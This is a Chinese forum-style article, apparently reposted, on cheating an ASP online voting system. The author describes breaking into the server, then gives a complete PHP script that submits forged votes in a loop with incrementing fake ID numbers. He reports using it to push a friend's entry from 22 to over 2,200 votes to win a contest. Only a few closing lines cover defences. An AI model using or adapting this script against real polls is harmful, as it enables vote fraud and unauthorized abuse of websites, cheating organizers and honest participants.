投票系统的作弊与防范脚本安全 -电脑资料

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

文章作者:fhod

文章首发邪恶八进制转载请注明原始来源

前几日朋友找我帮忙.说是在一个网站参加样板房投票竞选.有没有办法帮他刷第一票.心肠好的我自然是答应了.然后朋友发来了网站..看了下是asp的..服务器安全做的还不错..没找到任何程序上的漏洞..通过旁注提权入侵进去后.发现管理员真的是很变态..本来打算修改数据库的.刚看了下投票的代码准备找出数据库连接文件.就被管理踢了..接着这事就搁下了..过了几天朋友又催..只好又看了下..才发现所有的漏洞都已经补掉..

还是直接从投票上入手把.希望可以找到突破口直接达到刷票的目的.投票选项如图1.

朋友的样板房名为"风华廊"所以图1中我

勾选上了"风·华廊"最多可选10项..其中姓名.联系电话.身份证号码都是虚构的.经过反复投票测试.此投票系统只对身份证号码进行了验证..假设一下身份证号为1234567890.姓名为测试.联系电话:13013011111只需要把身份证号码改为别的数字.如1234567891就可以再投上一票..并未对IP和cookies进行验证.完全可以达到刷票的目的..

图2是我抓的投票成功的数据包.

Aname=%B7%E7%26%238226%3B%BB%AA%C0%C8&username=%B2%E2%CA%D4&tel=13013011111&idcord=1234567890&Submit=%CC%E1%BD%BB

根据数据包构造出URL为

http://www.xxxx.com/ad/20061221/a.asp?action=add&Aname=%B7%E7%26%238226%3B%BB%AA% ... 13013011111&idcord=1234567890&Submit=%CC%E1%BD%BB

直接在IE里打开此页面会出现如图3的提示

但只要我们把其中的idcord=1234567890改为idcord=1234567891就会出现投票成功的对话框.知道了投票系统存在的缺陷后..现在就想办法利用程序实现刷票的目的..

写一个发包的程序把idcord设置为一个变量.然后每发送一次数据这个变量得数字就增加一个数.比如idcord=1234567**9循环一次就是idcord=1234567*79自动改变其中的数值..

这样的程序用VB.C.ASP,PHP都不难实现..下面就介绍下PHP的..以下所涉及到的PHP代码为EST的兄弟TTFCT所写.

程序完整代码(目标网站做了相应处理)

<?php

error_reporting(0);

ini_set("max_execution_time",0);

ini_set("default_socket_timeout",2);

print_r('Voting....');

for($i=0;$i<=9;$i++)

for($j=0;$j<=9;$j++)

for($k=0;$k<=9;$k++)

for($l=0;$l<=9;$l++)

{

$packet="POST/ad/20061221/a.asp?action=addHTTP/1.1\r\n";

$packet.="Accept:image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/x-shockwave-flash,*/*\r\n";

$packet.="Referer:http://www.xxx.com/ad/20061221/a.asp\r\n";

$packet.="Accept-Language:zh-cn\r\n";

$packet.="Content-Type:application/x-www-form-urlencoded\r\n";

$packet.="Accept-Encoding:gzip,deflate\r\n";

$packet.="User-Agent:Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.1;SV1;Maxthon)\r\n";

$packet.="Host:www.xxx.com\r\n";

$packet.="Content-Length:113\r\n";

$packet.="Connection:Keep-Alive\r\n";

$packet.="Cache-Control:no-cache\r\n";

$packet.="Cookie:ASPSESSIONIDASDCQDBT=NKKJPDLAMAMNHJHHNBBLOCCH\r\n\r\n";

$packet.="Aname=%B7%E7%26%238226%3B%BB%AA%C0%C8&username=%B2%E2%CA%D4&tel=13013011111&idcord=1234".$i.$j.$k.$l."90&Submit=%CC%E1%BD%BB\r\n";

if($fp=fsockopen("www.xxx.com",80,$errno,$errstr,50))

if(fwrite($fp,$packet,strlen($packet)))

print_r(

'

Successtovote

');

sleep(2);

print_r(

'

Waitfor2seconds'

);

}

?>

懂PHP的朋友一眼就能看出,这只是个发包的程序..其中ini_set("default_socket_timeout",2);为发送数据包的间隔时间为2秒.

for($i=0;$i<=9;$i++)

for($j=0;$j<=9;$j++)

for($k=0;$k<=9;$k++)

for($l=0;$l<=9;$l++)

是设置好的四个变量.在下面的数据包中..idcord=1234".$i.$j.$k.$l."90自动生成idcord为一个不重复的数值

利用程序写好了..下面就开始刷票..因为是PHP程序..所以要找个支持PHP的空间来运行..就算没有空间只要安装AppServ也一样可以..AppServ可以在http://www.skycn.com/soft/13703.html免费下载到.安装过程很简单的..这里就不说了..

先来看下未刷票前.."风华廊"的票数是多少...

从图4中可以看到是22票..接着我们执行PHP代码..

如图5..

出现"Successtovote"就是投票成功了..

因为我设置的是2秒钟投一票..一个小时也就是1800票.所以经过一个多小时后"风华廊"的票数成了2227票.图6

朋友的作品理所当然的就拿了第一..而我也因此获得了一顿丰富的午餐.

其实这样的投票程序只要加上cookies验证..一个IP只能投一票..每次投票的间隔时间..等措施就很难作弊了.此文并不是要教大家如何去刷投票.只是想以投票的目的让大家知道是如何刷票的..并在知道刷票的同时怎样去防范它..

相关文章

七夕节宣传语口号

酒吧七夕情人节派对广告语:如果你是单身,何不来派里一试姻缘?如果你是"双身",欢迎带你的朋友一起来,两个人一同感受糖果水晶派对温馨的体验,七夕节宣传语口号。如果你是已婚...
资料大全2016-06-09
七夕节宣传语口号

北大中文系就业前景

语言文学专业,俗称中文专业,素有“万金油”之称,毕业生就业范围非常广阔.据不完全统计,目前全国开设中文专业的高校多达500余所,综合性大学、人文社科类高校基本都有文学院或中文系.近10年来,不少理工科...
资料大全2011-01-04
北大中文系就业前景

开心的同义词

开心,指心情舒畅,快乐。见汉·王充《论衡·艺增》:“经增非一,略举较著,令恍惑之人,观览采择,得以开心通意,晓解觉悟。”现在是小编为您整理的开心的同义词,希望对您有所帮助。  同、反义词  同义词:...
资料大全2013-01-01
开心的同义词

新员工的培训内容

培训是新员工成长的重要阶段,是新员工上岗前的基础培训,本文就来分享一篇新员工的培训内容,希望对大家能有所帮助!1.公司的地理位置和工作环境。具体应包括:(1)公司在该城市的客观位置,公司的平面图以及公...
资料大全2016-07-04
新员工的培训内容

年月日

赵丽妃 设计 教学内容:教材第81页到83页内容,练习十八第1~5题。 教学目标 : 1、使学生认识时间单位年、月、日,知道大月、小月、平年、闰年的知识,记住各月及平年、闰年的天数,能...
资料大全2018-07-01
年月日

小人国续写

小人国续写(一)格列佛回到英国,两个星期后格列佛想小人国里面的小人了。就又一次来到了小人国。格列佛来到了小人国,可是眼前的一面景象把他吓呆了。这里人烟稀少,空气污浊,有几个小人看见了格列佛满怀欣喜的说...
资料大全2014-06-08
小人国续写